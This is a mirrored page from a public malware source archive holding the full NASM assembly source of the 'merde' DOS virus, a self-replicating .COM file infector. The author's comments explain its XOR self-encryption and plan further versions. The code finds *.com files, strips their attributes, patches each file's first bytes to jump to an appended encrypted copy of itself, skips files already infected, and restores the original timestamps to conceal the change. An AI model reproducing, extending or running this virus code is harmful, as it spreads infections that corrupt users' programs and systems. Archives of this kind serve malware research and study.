mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
203 lines
4.7 KiB
NASM
203 lines
4.7 KiB
NASM
|
;well, here's the next installment of the merde virus...all that is new;
|
|||
|
;is your run of the mill xor encryption........and a little change in;
|
|||
|
;the code itself to make it slightly more modular...;
|
|||
|
;up+coming: .exe version(why put 'em together? makes it too big);
|
|||
|
; an actual function besides infect!;
|
|||
|
; TSR infect version?;
|
|||
|
attrib equ 21
|
|||
|
time equ 22
|
|||
|
date equ 24
|
|||
|
fspec_address equ 0e4h
|
|||
|
filesize equ 26
|
|||
|
fname equ 30
|
|||
|
dta equ 80h
|
|||
|
virsize equ 354
|
|||
|
byte_compare_val equ 35
|
|||
|
CODE_SEG SEGMENT BYTE
|
|||
|
ASSUME DS:CODE_SEG, CS:CODE_SEG
|
|||
|
ORG 100h
|
|||
|
first: jmp caller
|
|||
|
db 128 dup(00)
|
|||
|
caller: call caller2 ;si=this address for the whole thing;
|
|||
|
|
|||
|
;ok, for encryption, we use the value of the byte at the jump instruction;
|
|||
|
;if the file we find isn't infected...;
|
|||
|
|
|||
|
encryptv: db ?
|
|||
|
|
|||
|
;si=offset of the "caller";
|
|||
|
|
|||
|
caller2: pop si
|
|||
|
sub si,3
|
|||
|
jmp getstart
|
|||
|
|
|||
|
;jmp to getstart and have it call us back, getting the address of "start";
|
|||
|
;into es..(I know, why not just add the size of the stuff to si?;
|
|||
|
;I'll do it some other time;
|
|||
|
|
|||
|
after: pop es ;es=start:;
|
|||
|
|
|||
|
;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
|
|||
|
;function so it was more unsingular to a particular circumstance;
|
|||
|
|
|||
|
mov bp,es ;unencrypt de code+jump to virus;
|
|||
|
jmp encrypt
|
|||
|
|
|||
|
;if we are being called from the write proc, we need to save BP on the stack;
|
|||
|
|
|||
|
encrypt_w: mov ax,bp ;ax=whereto jump at end;
|
|||
|
pop bp ;bp=return to write routine;
|
|||
|
push ax ;where to jump at end is on stack
|
|||
|
;note the standard, run o' the mill encrypt/decrypt!;
|
|||
|
|
|||
|
encrypt: push bx ;might not be needed, I'll check later;
|
|||
|
push si
|
|||
|
mov cl,[si+3] ;offset of encrypt value;
|
|||
|
mov bx,es ;where to start encrypting;
|
|||
|
xor si,si
|
|||
|
xloop: mov al,[bx+si]
|
|||
|
xor al,cl
|
|||
|
mov [bx+si],al
|
|||
|
cmp si,0e7h ;size of post-start(or close enough);
|
|||
|
ja done
|
|||
|
inc si
|
|||
|
jmp xloop
|
|||
|
done: pop si
|
|||
|
pop bx
|
|||
|
jmp bp ;jump whereever we were supposed to;
|
|||
|
|
|||
|
write_code: call encrypt_w ;yep, encrypt it;
|
|||
|
pop bp ;get back address in this infected file;
|
|||
|
mov bx,[di+9] ;file to jump to, and file handle;
|
|||
|
mov ah,40h
|
|||
|
mov cx,virsize ;total virus size
|
|||
|
mov dx,si
|
|||
|
int 21h
|
|||
|
call close_current
|
|||
|
jmp nofiles ;not really, just didn't change name;
|
|||
|
;this proc closes the file with original stats;
|
|||
|
close_current:
|
|||
|
mov dx,[di+14]
|
|||
|
mov cx,[di+12]
|
|||
|
mov ax,5701h
|
|||
|
mov bx,[di+9]
|
|||
|
int 21h
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
mov ax,4301h
|
|||
|
xor ch,ch
|
|||
|
mov cl,[di+11]
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
nofiles: push ds
|
|||
|
pop es
|
|||
|
jmp bp
|
|||
|
|
|||
|
getstart: call after
|
|||
|
|
|||
|
|
|||
|
;encrypted from here on out-es=start of this procedure;
|
|||
|
start: mov di,es
|
|||
|
add di,fspec_address ;di=ADDRESS OF FILESPEC!;
|
|||
|
mov dh,[di+18]
|
|||
|
mov ah,[di+17]
|
|||
|
mov al,[di+16]
|
|||
|
mov bx,100h
|
|||
|
mov [bx],al
|
|||
|
mov [bx+1],ah
|
|||
|
mov [bx+2],dh
|
|||
|
mov bp,bx
|
|||
|
mov ah,4eh ;------------------;
|
|||
|
mov cx,33
|
|||
|
mov dx,di ;find file match;
|
|||
|
search: int 21h
|
|||
|
jc nofiles ;get out if none found;
|
|||
|
mov bx,dta+filesize ;compare filesize via BX;
|
|||
|
cmp word ptr [bx],65000
|
|||
|
ja leave1
|
|||
|
cmp word ptr [bx],150
|
|||
|
jb leave1
|
|||
|
jmp ok
|
|||
|
leave1: mov ah,4fh
|
|||
|
jmp search
|
|||
|
ok: CLC
|
|||
|
|
|||
|
;Okay-- DI=base of fspec;
|
|||
|
mov bx,dta+attrib
|
|||
|
mov al,[bx]
|
|||
|
mov [di+11],al ;save attrib;
|
|||
|
mov ax,word ptr [bx+1]
|
|||
|
mov [di+12],ax ;save time;
|
|||
|
mov ax,word ptr [bx+3]
|
|||
|
mov [di+14],ax ;save date;
|
|||
|
mov ax,4301h
|
|||
|
mov cx,0
|
|||
|
mov dx,dta+fname
|
|||
|
int 21h ;set attrib to 0;
|
|||
|
label2: mov ax,3d02h
|
|||
|
int 21h
|
|||
|
mov [di+9],ax ;open + save handle;
|
|||
|
mov bx,ax
|
|||
|
mov ah,3fh
|
|||
|
mov cx,3
|
|||
|
mov dx,di
|
|||
|
add dx,16 ;dx points to save area for first three bytes;
|
|||
|
int 21h ;open handle, and read 3 bytes into it;
|
|||
|
cmp byte ptr [di+16],0e9h
|
|||
|
jne label1
|
|||
|
cont: mov ax,4200h
|
|||
|
xor cx,cx
|
|||
|
mov dx,[di+17]
|
|||
|
add dx,3+byte_compare_val
|
|||
|
mov bx,[di+9]
|
|||
|
int 21h
|
|||
|
mov ah,3fh
|
|||
|
mov cx,2
|
|||
|
mov dx,di
|
|||
|
add dx,6
|
|||
|
int 21h
|
|||
|
mov dx,[di+6]
|
|||
|
cmp dx,[si+byte_compare_val]
|
|||
|
jne label1
|
|||
|
call close_current
|
|||
|
jmp leave1
|
|||
|
label1:
|
|||
|
;set encrypt value here---(low order byte of filesize of next file;
|
|||
|
mov bx,dta+filesize
|
|||
|
mov dl,[bx]
|
|||
|
mov [si+3],dl
|
|||
|
mov bx,[di+9]
|
|||
|
mov ax,4200h
|
|||
|
xor cx,cx
|
|||
|
mov dx,0
|
|||
|
int 21h
|
|||
|
;okay, this is kinda thick..;
|
|||
|
;set pointer to after jmp instruct, and change address to size;
|
|||
|
;of file plus 3 for jmp instruction, minding that we have to flip stuff;
|
|||
|
mov bx,dta+filesize
|
|||
|
mov dh,[bx+1] ;high val equals 2nd part of word+vice versa;
|
|||
|
mov dl,[bx]
|
|||
|
sub dx,3
|
|||
|
mov [di+7],dx
|
|||
|
mov byte ptr [di+6],0e9h
|
|||
|
mov ah,40h
|
|||
|
mov bx,[di+9]
|
|||
|
mov dx,di
|
|||
|
add dx,6
|
|||
|
mov cx,3
|
|||
|
int 21h
|
|||
|
xor cx,cx
|
|||
|
mov ax,4202h
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jmp write_code
|
|||
|
|
|||
|
fspec: db '*.com',0 ;bx+0;
|
|||
|
disk_buffer: db 3 DUP(?) ;di+6;
|
|||
|
handle: dw ? ;di+9;
|
|||
|
attribute: db ? ;di+11;
|
|||
|
otime: dw ? ;di+12;
|
|||
|
odate: dw ? ;di+14;
|
|||
|
first_3: db 0cdh,20h,00 ;di+16;
|
|||
|
CODE_SEG ENDS
|
|||
|
END first
|